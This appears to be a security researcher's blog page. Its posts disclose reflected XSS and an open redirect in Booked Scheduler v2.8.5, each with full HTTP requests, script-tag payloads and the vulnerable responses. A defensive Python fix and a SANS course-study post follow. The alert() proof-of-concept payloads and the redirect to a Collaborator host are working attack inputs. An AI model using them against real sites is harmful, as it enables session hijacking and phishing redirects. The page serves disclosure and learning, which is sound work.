Saturday, 19 October 2024

Friday Fun Pentest Series - 13 - Reflected XSS - booked scheduler v2.8.5

Description

- It was found that the application suffered from Reflected XSS on several pages


Reflected XSS #1 - "reservation.php"

// HTTP GET request

GET /Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; new_version=v%3D2.8.5%2Cfs%3D1728734988; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return to the last page that you were on</a></h5>
</div>

Reflected XSS #2 - "schedule.php"

// HTTP GET request

GET /Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb; resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D; schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return to the last page that you were on




Friday Fun Pentest Series - 12 - Open Redirect - booked scheduler v2.8.5

Description

- It was found that the application suffered from Open Redirect on the login page via the "resume" parameter


Open Redirect

Steps to Reproduce:

  1. Log in and intercept the HTTP request with a proxy such as Burp Suite or ZAP
  2. In the "resume" parameter, add the redirect URL, e.g. a Burp Collaborator URL
  3. Forward the request


// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]

email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg


// HTTP response

HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
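Defender-side handling of the two parameters abused in the findings above (the URL reflected into the "Return to the last page" link, and the "resume" redirect target), as an added Python example that is not Booked's own code; APP_PREFIX, DEFAULT_LANDING and both function names are assumptions.

```python
from html import escape
from urllib.parse import urlsplit, urlunsplit

# Assumption: the application's base path (the write-up shows randomised
# instance names such as /Bookedbo8effotfu/Web/; a fixed one is used here).
APP_PREFIX = "/Booked/Web/"
DEFAULT_LANDING = APP_PREFIX + "dashboard.php"   # assumed safe fallback page


def safe_resume_target(resume: str) -> str:
    """Return a post-login redirect target that cannot leave the application.

    Only path-relative targets under APP_PREFIX are accepted. A scheme
    (https:, javascript:), a host (including protocol-relative //host or the
    backslash variant /\\host) or control characters fall back to DEFAULT_LANDING.
    """
    if not resume or any(ord(c) < 0x20 for c in resume):
        return DEFAULT_LANDING
    # Browsers treat '\' like '/' when locating the authority, so normalise first.
    parts = urlsplit(resume.replace("\\", "/"))
    if parts.scheme or parts.netloc:
        return DEFAULT_LANDING          # absolute or protocol-relative URL
    if not parts.path.startswith(APP_PREFIX):
        return DEFAULT_LANDING          # outside the application
    # Rebuild from path and query only; the fragment never reaches the server anyway.
    return urlunsplit(("", "", parts.path, parts.query, ""))


def return_link(request_uri: str) -> str:
    """Render the 'Return to the last page' anchor with the URI attribute-encoded.

    html.escape(..., quote=True) turns '"' into '&quot;' and '<' into '&lt;',
    so a value such as rid="><script>... cannot close the href attribute and
    start a script element as it does in the responses above.
    """
    return ('<h5><a href="%s">Return to the last page that you were on</a></h5>'
            % escape(request_uri, quote=True))


if __name__ == "__main__":
    # Constructed inputs mirroring the write-up.
    print(safe_resume_target("https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com"))
    print(safe_resume_target(APP_PREFIX + "schedule.php?sid=1"))
    print(return_link(APP_PREFIX + 'reservation.php?rid="><script>alert(document.domain)</script>'))
```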

Saturday, 5 October 2024

New Certification Study - SANS 522

Happy to announce that I have enrolled on the SANS 522 course for Web Security. Will keep updating my blog on what has been learned so far.


Introduction

  • Instructor is Jason Lam
  • The course comes with six books in PDF and hardcopy format
  • I opted to purchase the exam voucher and two practice tests
  • The course provides a VM so you can practice
  • Also has on-demand videos for each module and topic


Book 1:

  • Focuses on misconfigurations
  • Architecture security
  • Basics of how the web works
  • SSRF
  • HTTP methods

Book 2:

  • Input validation
  • Injection attacks and their mitigations
  • CSRF and other attacks including defences
  • File upload functionality
  • Unicode attacks


Book 3:

  • Authentication security
  • Authorization security
  • SAML/Oauth security


Book 4:

  • Frontend security
  • AJAX security
  • Web services
  • NodeJS security
  • Clickjacking
  • Browser security


Book 5:

  • API security
  • GraphQL security
  • Deserialization

The link for the course is here:

https://www.sans.org/cyber-security-courses/application-security-securing-web-apps-api-microservices/



Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8

Description - It was found that the application was vulnerable to Stored XSS via a specific payload that bypassed the filtering in place. Stor...